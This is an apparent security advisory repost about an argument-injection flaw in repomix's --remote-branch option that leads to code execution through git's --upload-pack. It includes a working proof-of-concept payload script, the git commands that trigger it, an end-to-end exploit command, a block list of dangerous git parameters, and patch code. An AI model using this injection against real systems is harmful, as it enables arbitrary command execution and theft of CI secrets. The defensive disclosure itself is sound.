Repomix Argument Injection via (GHSA-9mm9-rqhj-j5mx) -DC-Jul2026-787

Listen to this Post

The `–remote-branch` CLI option in repomix is vulnerable to argument injection (CWE-88). User-supplied input is passed directly to `git fetch` and `git checkout` subprocesses via `child_process.execFileAsync` without sanitization, `–` delimiters, or validation. An attacker can inject arbitrary git command-line options. By injecting the `–upload-pack` option and specifying an SSH (git@...) or local (file://) remote URL, an attacker achieves arbitrary command execution with the privileges of the user running repomix. This bypasses the existing `dangerousParams` blocklist implemented in validateGitUrl().
The vulnerable code resides in src/core/git/gitCommand.ts. The `remoteBranch` parameter is appended directly to the arguments array for git subprocesses without the `–` positional delimiter. Sink 1 (Lines 118-127): await deps.execFileAsync('git', ['-C', directory, 'fetch', '--depth', '1', 'origin', remoteBranch], gitRemoteOpts);. Sink 2 (Lines 148-151): await deps.execFileAsync('git', ['-C', directory, 'checkout', remoteBranch]);. The application attempts to prevent this exact vulnerability class by blocking dangerous parameters (--upload-pack, --receive-pack, --config, --exec) within the `validateGitUrl` function. However, this validation is exclusively applied to the `url` variable and omitted for remoteBranch, creating a direct bypass.
The attack flow is:

 `repomix --remote-branch <injected_option>` → `src/cli/actions/remoteAction.ts:226` (cloneRepository) → `src/core/git/gitCommand.ts:118` (execGitShallowClone) → [bash] `execFileAsync('git', ['...', 'origin', '--upload-pack=/tmp/payload'])` → [bash] git invokes the payload binary via transport helper. Execution occurs prior to git protocol validation. The script executes successfully despite the fetch operation returning a 128 exit code.

<h2 style="color: blue;">DailyCVE Form:</h2>

Platform: Repomix
Version: <1.14.1
Vulnerability: Argument Injection
Severity: High (8.8)
date: 2026-05-18
<h2 style="color: blue;">Prediction: 2026-05-27</h2>

<h2 style="color: blue;">What Undercode Say:</h2>

<h2 style="color: blue;">Analytics:</h2>

<ul>
<li>Attack Vector: Remote</li>
<li>Privileges Required: None</li>
<li>User Interaction: Required</li>
<li>CVSS Score: 8.8</li>
</ul>

<h2 style="color: blue;">Bash Commands & Codes:</h2>

[bash]
Create payload
cat > /tmp/malicious-pack << 'EOF'
!/bin/bash
echo "=== RCE EXECUTED ===" > /tmp/repomix-pwned.txt
id >> /tmp/repomix-pwned.txt
EOF
chmod +x /tmp/malicious-pack
Trigger vulnerability
git init --bare /tmp/dummy-remote.git
mkdir /tmp/test-fetch && cd /tmp/test-fetch
git init
git remote add origin file:///tmp/dummy-remote.git
git fetch --upload-pack=/tmp/malicious-pack origin 2>&1
Verify execution
cat /tmp/repomix-pwned.txt

End-to-End Exploit:

repomix --remote [email protected]:yamadashy/repomix.git --remote-branch '--upload-pack=/tmp/malicious-pack'

Exploit:

  1. Create an executable payload script that writes system execution context to a file.
  2. Establish a dummy remote and trigger the fetch operation, injecting the `–upload-pack` argument.
  3. The payload executes prior to git protocol validation, achieving arbitrary command execution with the privileges of the user running repomix.

Protection:

  • Primary Fix: Append the `–` delimiter to explicitly separate options from positional arguments in all git subprocess calls utilizing remoteBranch.
    await deps.execFileAsync(
    'git',
    ['-C', directory, 'fetch', '--depth', '1', 'origin', '--', remoteBranch],
    gitRemoteOpts,
    );
    
  • Defense in Depth: Update `execGitShallowClone` to validate `remoteBranch` against the existing `dangerousParams` array.
    const dangerousParams = ['--upload-pack', '--receive-pack', '--config', '--exec'];
    if (remoteBranch && dangerousParams.some((param) => remoteBranch.includes(param))) {
    throw new RepomixError(<code>Invalid branch name. Contains potentially dangerous parameters: ${remoteBranch}</code>);
    }
    
  • Upgrade to repomix v1.14.1 or later.

Impact:

  • Remote Code Execution: Complete system compromise with the privileges of the user executing repomix.
  • CI/CD Compromise: If repomix is utilized in automated pipelines where `–remote-branch` is populated by external triggers (e.g., webhook payloads, PR s), attackers can compromise build servers and exfiltrate secrets.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top